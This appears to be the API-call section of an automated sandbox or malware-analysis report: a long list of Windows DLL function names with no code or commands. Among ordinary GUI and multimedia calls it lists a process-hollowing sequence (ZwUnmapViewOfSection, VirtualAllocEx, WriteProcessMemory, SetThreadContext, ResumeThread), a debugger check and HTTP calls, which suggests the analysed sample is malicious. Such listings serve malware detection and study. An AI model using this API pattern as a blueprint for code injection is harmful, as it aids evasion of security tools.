  • jsproxy.dll.InternetDeInitializeAutoProxyDll
  • jsproxy.dll.InternetInitializeAutoProxyDll
  • jsproxy.dll.InternetGetProxyInfoEx
  • jsproxy.dll.InternetDeInitializeAutoProxyDllEx
  • jsproxy.dll.InternetInitializeAutoProxyDllEx
  • advapi32.dll.RegOpenKeyExW
  • advapi32.dll.RegCloseKey
  • advapi32.dll.RegQueryValueW
  • ole32.dll.CLSIDFromString
  • ole32.dll.CoCreateInstance
  • advapi32.dll.RegQueryValueExA
  • ole32.dll.CoGetObjectContext
  • advapi32.dll.RegCreateKeyA
  • shlwapi.dll.StrCmpW
  • sechost.dll.LookupAccountNameLocalW
  • advapi32.dll.LookupAccountSidW
  • sechost.dll.LookupAccountSidLocalW
  • cryptsp.dll.CryptAcquireContextW
  • cryptsp.dll.CryptGenRandom
  • rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
  • oleaut32.dll.#4
  • oleaut32.dll.#6
  • ole32.dll.CoGetMalloc
  • ole32.dll.CreateBindCtx
  • ole32.dll.CoTaskMemAlloc
  • ole32.dll.CoGetApartmentType
  • ole32.dll.CoRegisterInitializeSpy
  • ole32.dll.CoTaskMemFree
  • comctl32.dll.#236
  • comctl32.dll.#320
  • comctl32.dll.#324
  • comctl32.dll.#323
  • comctl32.dll.#328
  • comctl32.dll.#334
  • advapi32.dll.RegEnumKeyW
  • oleaut32.dll.#2
  • advapi32.dll.InitializeSecurityDescriptor
  • advapi32.dll.SetEntriesInAclW
  • advapi32.dll.SetSecurityDescriptorDacl
  • advapi32.dll.IsTextUnicode
  • comctl32.dll.#332
  • comctl32.dll.#338
  • comctl32.dll.#339
  • shell32.dll.#102
  • ole32.dll.CoUninitialize
  • ole32.dll.CoRevokeInitializeSpy
  • comctl32.dll.#388
  • oleaut32.dll.#500
  • setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
  • setupapi.dll.CM_Get_Device_Interface_List_ExW
  • comctl32.dll.#386
  • ext-ms-win-kernel32-package-current-l1-1-0.dll.GetCurrentPackageId
  • kernel32.dll.AreFileApisANSI
  • ntdll.dll.ZwUnmapViewOfSection
  • advapi32.dll.UnregisterTraceGuids
  • kernel32.dll.SetThreadUILanguage
  • kernel32.dll.CopyFileExW
  • kernel32.dll.IsDebuggerPresent
  • kernel32.dll.SetConsoleInputExeNameW
  • kernel32.dll.IsProcessorFeaturePresent
  • kernel32.dll.GetTempPathA
  • kernel32.dll.CreateDirectoryA
  • kernel32.dll.MoveFileA
  • kernel32.dll.OpenThread
  • kernel32.dll.CreateWaitableTimerA
  • kernel32.dll.SetWaitableTimer
  • user32.dll.MsgWaitForMultipleObjects
  • kernel32.dll.CreateToolhelp32Snapshot
  • kernel32.dll.Process32First
  • kernel32.dll.Process32Next
  • kernel32.dll.CloseHandle
  • kernel32.dll.GetLogicalDriveStringsA
  • kernel32.dll.OpenEventA
  • kernel32.dll.CreateEventA
  • ole32.dll.CoInitializeSecurity
  • kernel32.dll.MultiByteToWideChar
  • ole32.dll.IIDFromString
  • oleaut32.dll.SysAllocString
  • kernel32.dll.GetThreadPreferredUILanguages
  • kernel32.dll.SetThreadPreferredUILanguages
  • kernel32.dll.LocaleNameToLCID
  • kernel32.dll.LCIDToLocaleName
  • kernel32.dll.GetSystemDefaultLocaleName
  • oleaut32.dll.SysFreeString
  • ole32.dll.CoSetProxyBlanket
  • oleaut32.dll.#283
  • oleaut32.dll.#284
  • kernel32.dll.lstrcatA
  • wininet.dll.InternetOpenA
  • ole32.dll.CoInitialize
  • oleaut32.dll.#161
  • wininet.dll.InternetConnectA
  • wininet.dll.HttpOpenRequestA
  • wininet.dll.InternetSetOptionA
  • wininet.dll.HttpSendRequestA
  • sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid
  • oleaut32.dll.#8
  • oleaut32.dll.#28
  • oleaut32.dll.#9
  • shlwapi.dll.StrRChrA
  • oleaut32.dll.#12
  • shlwapi.dll.StrCmpNW
  • shlwapi.dll.#153
  • ws2_32.dll.GetAddrInfoW
  • ws2_32.dll.WSASocketW
  • ws2_32.dll.#2
  • ws2_32.dll.#21
  • ws2_32.dll.#9
  • ws2_32.dll.WSAIoctl
  • ws2_32.dll.FreeAddrInfoW
  • ws2_32.dll.#6
  • ws2_32.dll.#5
  • ws2_32.dll.WSARecv
  • ws2_32.dll.WSASend
  • ole32.dll.CreateStreamOnHGlobal
  • ws2_32.dll.#22
  • ole32.dll.GetHGlobalFromStream
  • oleaut32.dll.#411
  • oleaut32.dll.#23
  • oleaut32.dll.#24
  • ws2_32.dll.#3
  • rpcrt4.dll.RpcBindingFree
  • wininet.dll.InternetReadFile
  • wininet.dll.HttpQueryInfoA
  • wininet.dll.InternetCloseHandle
  • kernel32.dll.LocalSize
  • kernel32.dll.RtlMoveMemory
  • kernel32.dll.GetEnvironmentVariableA
  • kernel32.dll.CreateProcessA
  • kernel32.dll.GetThreadContext
  • kernel32.dll.ReadProcessMemory
  • kernel32.dll.VirtualAllocEx
  • kernel32.dll.WriteProcessMemory
  • kernel32.dll.lstrcpyn
  • kernel32.dll.VirtualProtectEx
  • kernel32.dll.SetThreadContext
  • kernel32.dll.ResumeThread
  • oleaut32.dll.#202
  • oleaut32.dll.#201
  • urlmon.dll.#414
  • urlmon.dll.CreateUri
  • apphelp.dll.ApphelpCheckShellObject
  • urlmon.dll.CreateURLMonikerEx
  • urlmon.dll.CreateAsyncBindCtxEx
  • urlmon.dll.RegisterBindStatusCallback
  • urlmon.dll.CreateFormatEnumerator
  • urlmon.dll.UrlMkGetSessionOption
  • urlmon.dll.CoInternetCreateSecurityManager
  • kernel32.dll.IsWow64Process
  • mlang.dll.#121
  • urlmon.dll.#444
  • schannel.dll.SpUserModeInitialize
  • advapi32.dll.RegCreateKeyExW
  • advapi32.dll.RegQueryValueExW
  • crypt32.dll.CertDuplicateStore
  • crypt32.dll.CertControlStore
  • crypt32.dll.CertCloseStore
  • secur32.dll.FreeContextBuffer
  • ncrypt.dll.SslOpenProvider
  • ncrypt.dll.GetSChannelInterface
  • bcryptprimitives.dll.GetHashInterface
  • ncrypt.dll.SslIncrementProviderReferenceCount
  • ncrypt.dll.SslImportKey
  • bcryptprimitives.dll.GetCipherInterface
  • ncrypt.dll.SslLookupCipherSuiteInfo
  • crypt32.dll.CertDuplicateCertificateContext
  • wintrust.dll.HTTPSCertificateTrust
  • wintrust.dll.HTTPSFinalProv
  • wintrust.dll.SoftpubInitialize
  • wintrust.dll.SoftpubLoadMessage
  • wintrust.dll.SoftpubLoadSignature
  • wintrust.dll.SoftpubCheckCert
  • wintrust.dll.SoftpubCleanup
  • cryptsp.dll.CryptAcquireContextA
  • crypt32.dll.CertDuplicateCertificateChain
  • crypt32.dll.CertGetCertificateContextProperty
  • cryptsp.dll.CryptReleaseContext
  • crypt32.dll.CertFreeCertificateChain
  • crypt32.dll.CertFreeCertificateContext
  • ncrypt.dll.SslLookupCipherLengths
  • ncrypt.dll.SslEncryptPacket
  • ncrypt.dll.SslDecryptPacket
  • version.dll.GetFileVersionInfoSizeW
  • version.dll.GetFileVersionInfoW
  • version.dll.VerQueryValueW
  • kernel32.dll.InitializeSRWLock
  • kernel32.dll.AcquireSRWLockExclusive
  • kernel32.dll.AcquireSRWLockShared
  • kernel32.dll.ReleaseSRWLockExclusive
  • kernel32.dll.ReleaseSRWLockShared
  • mlang.dll.#112
  • urlmon.dll.CreateIUriBuilder
  • urlmon.dll.IntlPercentEncodeNormalize
  • wininet.dll.GetUrlCacheEntryInfoA
  • urlmon.dll.CoInternetQueryInfo
  • wininet.dll.CommitUrlCacheEntryA
  • oleaut32.dll.#7
  • ieframe.dll.#302
  • urlmon.dll.RegisterFormatEnumerator
  • urlmon.dll.RevokeBindStatusCallback
  • urlmon.dll.#101
  • oleaut32.dll.VariantClear
  • t2embed.dll.TTLoadEmbeddedFont
  • urlmon.dll.CoInternetIsFeatureEnabled
  • uxtheme.dll.IsAppThemed
  • ddraw.dll.DirectDrawCreate
  • ddraw.dll.DirectDrawEnumerateW
  • ddraw.dll.DirectDrawEnumerateA
  • user32.dll.EnumDisplayDevicesA
  • user32.dll.GetMonitorInfoA
  • wintrust.dll.WinVerifyTrust
  • imgutil.dll.DecodeImage
  • sxs.dll.SxsOleAut32RedirectTypeLibrary
  • advapi32.dll.RegOpenKeyW
  • kernel32.dll.NlsGetCacheUpdateCount
  • wininet.dll.GetUrlCacheEntryInfoExW
  • kernel32.dll.GetThreadUILanguage
  • oleaut32.dll.#15
  • oleaut32.dll.#26
  • oleaut32.dll.#3
  • shell32.dll.SHGetFolderPathW
  • wininet.dll.CreateUrlCacheEntryA
  • oleaut32.dll.#16
  • ieframe.dll.#234
  • wininet.dll.InternetUnlockRequestFile
  • oleaut32.dll.#147
  • comctl32.dll.ImageList_Create
  • comctl32.dll.ImageList_ReplaceIcon
  • urlmon.dll.#330
  • ws2_32.dll.#116
  • kernel32.dll.SetFilePointer
  • kernel32.dll.GetCurrentProcess
  • kernel32.dll.DuplicateHandle
  • kernel32.dll.lstrcpynA
  • kernel32.dll.SetLastError
  • kernel32.dll.FileTimeToLocalFileTime
  • kernel32.dll.FileTimeToSystemTime
  • kernel32.dll.LocalFree
  • kernel32.dll.WideCharToMultiByte
  • kernel32.dll.InterlockedDecrement
  • kernel32.dll.SuspendThread
  • kernel32.dll.TerminateThread
  • kernel32.dll.ReleaseMutex
  • kernel32.dll.CreateMutexA
  • kernel32.dll.CreateSemaphoreA
  • kernel32.dll.ReleaseSemaphore
  • kernel32.dll.EnterCriticalSection
  • kernel32.dll.LeaveCriticalSection
  • kernel32.dll.GetProfileStringA
  • kernel32.dll.SetStdHandle
  • kernel32.dll.IsBadCodePtr
  • kernel32.dll.IsBadReadPtr
  • kernel32.dll.CompareStringW
  • kernel32.dll.CompareStringA
  • kernel32.dll.SetUnhandledExceptionFilter
  • kernel32.dll.GetStringTypeW
  • kernel32.dll.GetStringTypeA
  • kernel32.dll.IsBadWritePtr
  • kernel32.dll.VirtualAlloc
  • kernel32.dll.LCMapStringW
  • kernel32.dll.LCMapStringA
  • kernel32.dll.SetEnvironmentVariableA
  • kernel32.dll.VirtualFree
  • kernel32.dll.HeapCreate
  • kernel32.dll.HeapDestroy
  • kernel32.dll.GetFileType
  • kernel32.dll.GetStdHandle
  • kernel32.dll.SetHandleCount
  • kernel32.dll.GetEnvironmentStringsW
  • kernel32.dll.GetEnvironmentStrings
  • kernel32.dll.FreeEnvironmentStringsW
  • kernel32.dll.FreeEnvironmentStringsA
  • kernel32.dll.UnhandledExceptionFilter
  • kernel32.dll.GetACP
  • kernel32.dll.HeapSize
  • kernel32.dll.WriteFile
  • kernel32.dll.ReadFile
  • kernel32.dll.WaitForMultipleObjects
  • kernel32.dll.CreateFileA
  • kernel32.dll.SetEvent
  • kernel32.dll.FindResourceA
  • kernel32.dll.LoadResource
  • kernel32.dll.LockResource
  • kernel32.dll.RemoveDirectoryA
  • kernel32.dll.GetModuleFileNameA
  • kernel32.dll.GetCurrentThreadId
  • kernel32.dll.ExitProcess
  • kernel32.dll.GlobalSize
  • kernel32.dll.GlobalFree
  • kernel32.dll.DeleteCriticalSection
  • kernel32.dll.InitializeCriticalSection
  • kernel32.dll.lstrlenA
  • kernel32.dll.WinExec
  • kernel32.dll.lstrcpyA
  • kernel32.dll.FindNextFileA
  • kernel32.dll.GlobalReAlloc
  • kernel32.dll.HeapFree
  • kernel32.dll.HeapReAlloc
  • kernel32.dll.GetProcessHeap
  • kernel32.dll.HeapAlloc
  • kernel32.dll.GetFullPathNameA
  • kernel32.dll.FreeLibrary
  • kernel32.dll.LoadLibraryA
  • kernel32.dll.GetLastError
  • kernel32.dll.GetVersionExA
  • kernel32.dll.WritePrivateProfileStringA
  • kernel32.dll.CreateThread
  • kernel32.dll.Sleep
  • kernel32.dll.ExpandEnvironmentStringsA
  • kernel32.dll.GlobalAlloc
  • kernel32.dll.GlobalLock
  • kernel32.dll.GlobalUnlock
  • kernel32.dll.FindFirstFileA
  • kernel32.dll.FindClose
  • kernel32.dll.GetFileAttributesA
  • kernel32.dll.DeleteFileA
  • kernel32.dll.CopyFileA
  • kernel32.dll.TerminateProcess
  • kernel32.dll.RaiseException
  • kernel32.dll.GetLocalTime
  • kernel32.dll.GetSystemTime
  • kernel32.dll.GetTimeZoneInformation
  • kernel32.dll.RtlUnwind
  • kernel32.dll.GetStartupInfoA
  • kernel32.dll.GetOEMCP
  • kernel32.dll.GetCPInfo
  • kernel32.dll.GetProcessVersion
  • kernel32.dll.SetErrorMode
  • kernel32.dll.GlobalFlags
  • kernel32.dll.GetCurrentThread
  • kernel32.dll.GetFileTime
  • kernel32.dll.GetFileSize
  • kernel32.dll.TlsGetValue
  • kernel32.dll.LocalReAlloc
  • kernel32.dll.TlsSetValue
  • kernel32.dll.TlsFree
  • kernel32.dll.GlobalHandle
  • kernel32.dll.TlsAlloc
  • kernel32.dll.LocalAlloc
  • kernel32.dll.lstrcmpA
  • kernel32.dll.GetVersion
  • kernel32.dll.GlobalGetAtomNameA
  • kernel32.dll.GlobalAddAtomA
  • kernel32.dll.SetCurrentDirectoryA
  • kernel32.dll.GetVolumeInformationA
  • kernel32.dll.GetModuleHandleA
  • kernel32.dll.GetProcAddress
  • kernel32.dll.MulDiv
  • kernel32.dll.GetCommandLineA
  • kernel32.dll.GlobalFindAtomA
  • kernel32.dll.GlobalDeleteAtom
  • kernel32.dll.lstrcmpiA
  • kernel32.dll.SetEndOfFile
  • kernel32.dll.UnlockFile
  • kernel32.dll.LockFile
  • kernel32.dll.FlushFileBuffers
  • kernel32.dll.GetTickCount
  • kernel32.dll.WaitForSingleObject
  • kernel32.dll.InterlockedIncrement
  • advapi32.dll.RegQueryValueA
  • advapi32.dll.RegSetValueExA
  • advapi32.dll.RegOpenKeyExA
  • advapi32.dll.RegCreateKeyExA
  • comctl32.dll.ImageList_Destroy
  • comctl32.dll.#17
  • comdlg32.dll.GetFileTitleA
  • comdlg32.dll.GetSaveFileNameA
  • comdlg32.dll.GetOpenFileNameA
  • comdlg32.dll.ChooseColorA
  • gdi32.dll.CreateDIBitmap
  • gdi32.dll.GetSystemPaletteEntries
  • gdi32.dll.CreatePalette
  • gdi32.dll.StretchBlt
  • gdi32.dll.SelectPalette
  • gdi32.dll.RealizePalette
  • gdi32.dll.GetDIBits
  • gdi32.dll.BeginPath
  • gdi32.dll.EndPath
  • gdi32.dll.PathToRegion
  • gdi32.dll.CreateEllipticRgn
  • gdi32.dll.CreateRoundRectRgn
  • gdi32.dll.GetWindowExtEx
  • gdi32.dll.GetViewportOrgEx
  • gdi32.dll.GetWindowOrgEx
  • gdi32.dll.GetTextColor
  • gdi32.dll.GetBkMode
  • gdi32.dll.GetBkColor
  • gdi32.dll.GetROP2
  • gdi32.dll.GetStretchBltMode
  • gdi32.dll.GetPolyFillMode
  • gdi32.dll.CreateCompatibleBitmap
  • gdi32.dll.CreateDCA
  • gdi32.dll.CreateBitmap
  • gdi32.dll.SelectObject
  • gdi32.dll.GetObjectA
  • gdi32.dll.CreatePen
  • gdi32.dll.PatBlt
  • gdi32.dll.CombineRgn
  • gdi32.dll.CreateRectRgn
  • gdi32.dll.FillRgn
  • gdi32.dll.CreateSolidBrush
  • gdi32.dll.GetStockObject
  • gdi32.dll.CreateFontIndirectA
  • gdi32.dll.DeleteObject
  • gdi32.dll.EndDoc
  • gdi32.dll.DeleteDC
  • gdi32.dll.StartDocA
  • gdi32.dll.StartPage
  • gdi32.dll.BitBlt
  • gdi32.dll.CreateCompatibleDC
  • gdi32.dll.Ellipse
  • gdi32.dll.Rectangle
  • gdi32.dll.LPtoDP
  • gdi32.dll.DPtoLP
  • gdi32.dll.GetCurrentObject
  • gdi32.dll.RoundRect
  • gdi32.dll.GetTextExtentPoint32A
  • gdi32.dll.GetDeviceCaps
  • gdi32.dll.SaveDC
  • gdi32.dll.RestoreDC
  • gdi32.dll.SetBkMode
  • gdi32.dll.SetPolyFillMode
  • gdi32.dll.SetROP2
  • gdi32.dll.SetTextColor
  • gdi32.dll.SetMapMode
  • gdi32.dll.SetViewportOrgEx
  • gdi32.dll.OffsetViewportOrgEx
  • gdi32.dll.SetViewportExtEx
  • gdi32.dll.ScaleViewportExtEx
  • gdi32.dll.SetWindowOrgEx
  • gdi32.dll.SetWindowExtEx
  • gdi32.dll.ScaleWindowExtEx
  • gdi32.dll.GetClipBox
  • gdi32.dll.ExcludeClipRect
  • gdi32.dll.MoveToEx
  • gdi32.dll.LineTo
  • gdi32.dll.SelectClipRgn
  • gdi32.dll.CreatePolygonRgn
  • gdi32.dll.GetClipRgn
  • gdi32.dll.SetStretchBltMode
  • gdi32.dll.CreateRectRgnIndirect
  • gdi32.dll.SetBkColor
  • gdi32.dll.EndPage
  • gdi32.dll.GetTextMetricsA
  • gdi32.dll.Escape
  • gdi32.dll.ExtTextOutA
  • gdi32.dll.TextOutA
  • gdi32.dll.RectVisible
  • gdi32.dll.PtVisible
  • gdi32.dll.GetViewportExtEx
  • gdi32.dll.ExtSelectClipRgn
  • ole32.dll.OleInitialize
  • ole32.dll.OleUninitialize
  • oleaut32.dll.#186
  • oleaut32.dll.#163
  • shell32.dll.ShellExecuteA
  • shell32.dll.Shell_NotifyIconA
  • user32.dll.OpenClipboard
  • user32.dll.SetClipboardData
  • user32.dll.EmptyClipboard
  • user32.dll.GetSystemMetrics
  • user32.dll.GetCursorPos
  • user32.dll.MessageBoxA
  • user32.dll.SetWindowPos
  • user32.dll.SendMessageA
  • user32.dll.DestroyCursor
  • user32.dll.SetParent
  • user32.dll.GetClipboardData
  • user32.dll.PostMessageA
  • user32.dll.GetTopWindow
  • user32.dll.GetParent
  • user32.dll.GetFocus
  • user32.dll.GetClientRect
  • user32.dll.InvalidateRect
  • user32.dll.ValidateRect
  • user32.dll.UpdateWindow
  • user32.dll.CloseClipboard
  • user32.dll.wsprintfA
  • user32.dll.EqualRect
  • user32.dll.GetWindowRect
  • user32.dll.SetForegroundWindow
  • user32.dll.DestroyMenu
  • user32.dll.IsWindow
  • user32.dll.IsChild
  • user32.dll.ReleaseDC
  • user32.dll.IsRectEmpty
  • user32.dll.FillRect
  • user32.dll.GetDC
  • user32.dll.SetCursor
  • user32.dll.LoadCursorA
  • user32.dll.SetCursorPos
  • user32.dll.SetActiveWindow
  • user32.dll.GetSysColor
  • user32.dll.SetWindowLongA
  • user32.dll.GetWindowLongA
  • user32.dll.RedrawWindow
  • user32.dll.EnableWindow
  • user32.dll.IsWindowVisible
  • user32.dll.OffsetRect
  • user32.dll.PtInRect
  • user32.dll.DestroyIcon
  • user32.dll.IntersectRect
  • user32.dll.InflateRect
  • user32.dll.SetRect
  • user32.dll.SetScrollPos
  • user32.dll.SetScrollRange
  • user32.dll.GetScrollRange
  • user32.dll.SetCapture
  • user32.dll.GetCapture
  • user32.dll.ReleaseCapture
  • user32.dll.SetTimer
  • user32.dll.KillTimer
  • user32.dll.TranslateMessage
  • user32.dll.LoadIconA
  • user32.dll.DrawFrameControl
  • user32.dll.DrawEdge
  • user32.dll.DrawFocusRect
  • user32.dll.WindowFromPoint
  • user32.dll.GetMessageA
  • user32.dll.DispatchMessageA
  • user32.dll.SetRectEmpty
  • user32.dll.RegisterClipboardFormatA
  • user32.dll.CreateIconFromResourceEx
  • user32.dll.CreateIconFromResource
  • user32.dll.DrawIconEx
  • user32.dll.CreatePopupMenu
  • user32.dll.AppendMenuA
  • user32.dll.ModifyMenuA
  • user32.dll.CreateMenu
  • user32.dll.CreateAcceleratorTableA
  • user32.dll.SystemParametersInfoA
  • user32.dll.ShowWindow
  • user32.dll.IsWindowEnabled
  • user32.dll.TranslateAcceleratorA
  • user32.dll.CopyAcceleratorTableA
  • user32.dll.PostQuitMessage
  • user32.dll.IsZoomed
  • user32.dll.GetDlgCtrlID
  • user32.dll.GetSubMenu
  • user32.dll.EnableMenuItem
  • user32.dll.ClientToScreen
  • user32.dll.EnumDisplaySettingsA
  • user32.dll.LoadImageA
  • user32.dll.GetWindowTextA
  • user32.dll.GetWindowTextLengthA
  • user32.dll.CharUpperA
  • user32.dll.GetWindowDC
  • user32.dll.BeginPaint
  • user32.dll.EndPaint
  • user32.dll.TabbedTextOutA
  • user32.dll.DrawTextA
  • user32.dll.GrayStringA
  • user32.dll.GetDlgItem
  • user32.dll.DestroyWindow
  • user32.dll.CreateDialogIndirectParamA
  • user32.dll.EndDialog
  • user32.dll.GetNextDlgTabItem
  • user32.dll.GetWindowPlacement
  • user32.dll.RegisterWindowMessageA
  • user32.dll.GetForegroundWindow
  • user32.dll.GetLastActivePopup
  • user32.dll.GetMessageTime
  • user32.dll.RemovePropA
  • user32.dll.CallWindowProcA
  • user32.dll.GetPropA
  • user32.dll.UnhookWindowsHookEx
  • user32.dll.SetPropA
  • user32.dll.GetClassLongA
  • user32.dll.CallNextHookEx
  • user32.dll.SetWindowsHookExA
  • user32.dll.CreateWindowExA
  • user32.dll.GetMenuItemID
  • user32.dll.GetMenuItemCount
  • user32.dll.RegisterClassA
  • user32.dll.GetScrollPos
  • user32.dll.UnregisterClassA
  • user32.dll.AdjustWindowRectEx
  • user32.dll.MapWindowPoints
  • user32.dll.SendDlgItemMessageA
  • user32.dll.ScrollWindowEx
  • user32.dll.IsDialogMessageA
  • user32.dll.SetWindowTextA
  • user32.dll.MoveWindow
  • user32.dll.CheckMenuItem
  • user32.dll.SetMenuItemBitmaps
  • user32.dll.GetMenuState
  • user32.dll.GetMenuCheckMarkDimensions
  • user32.dll.GetClassNameA
  • user32.dll.GetDesktopWindow
  • user32.dll.LoadStringA
  • user32.dll.GetSysColorBrush
  • user32.dll.GetClassInfoA
  • user32.dll.DefWindowProcA
  • user32.dll.GetKeyState
  • user32.dll.GetMenu
  • user32.dll.SetMenu
  • user32.dll.PeekMessageA
  • user32.dll.IsIconic
  • user32.dll.SetFocus
  • user32.dll.GetActiveWindow
  • user32.dll.GetWindow
  • user32.dll.DestroyAcceleratorTable
  • user32.dll.SetWindowRgn
  • user32.dll.GetMessagePos
  • user32.dll.ScreenToClient
  • user32.dll.ChildWindowFromPointEx
  • user32.dll.CopyRect
  • user32.dll.LoadBitmapA
  • user32.dll.WinHelpA
  • winmm.dll.midiStreamRestart
  • winmm.dll.midiStreamClose
  • winmm.dll.midiOutReset
  • winmm.dll.midiStreamStop
  • winmm.dll.midiStreamOut
  • winmm.dll.midiOutPrepareHeader
  • winmm.dll.midiStreamProperty
  • winmm.dll.midiStreamOpen
  • winmm.dll.midiOutUnprepareHeader
  • winmm.dll.waveOutOpen
  • winmm.dll.waveOutGetNumDevs
  • winmm.dll.waveOutClose
  • winmm.dll.waveOutReset
  • winmm.dll.waveOutPause
  • winmm.dll.waveOutWrite
  • winmm.dll.waveOutPrepareHeader
  • winmm.dll.waveOutUnprepareHeader
  • winmm.dll.waveOutRestart
  • winspool.drv.ClosePrinter
  • winspool.drv.DocumentPropertiesA
  • winspool.drv.OpenPrinterA
  • ws2_32.dll.#17
  • ws2_32.dll.#10
  • ws2_32.dll.#16
  • ws2_32.dll.#1
  • ws2_32.dll.#14
  • ws2_32.dll.#101
  • ws2_32.dll.#12
  • user32.dll.FindWindowA
  • user32.dll.GetWindowInfo